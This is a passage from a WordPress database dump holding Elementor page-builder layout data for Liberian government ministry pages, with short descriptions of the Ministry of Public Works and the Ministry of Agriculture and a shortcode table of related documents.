buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cc92564\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(14160,2260,'_elementor_edit_mode','builder'),(14161,2260,'_elementor_template_type','wp-post'),(14162,2260,'_elementor_version','2.7.5'),(14163,2260,'_wp_page_template','default'),(14164,2260,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cc92564\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14166,2261,'_elementor_edit_mode','builder'),(14167,2261,'_elementor_template_type','wp-post'),(14168,2261,'_elementor_version','2.7.5'),(14169,2261,'_wp_page_template','default'),(14170,2261,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d64faa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14173,2262,'_elementor_edit_mode','builder'),(14174,2262,'_elementor_template_type','wp-post'),(14175,2262,'_elementor_version','2.7.5'),(14176,2262,'_wp_page_template','default'),(14177,2262,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cc92564\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_d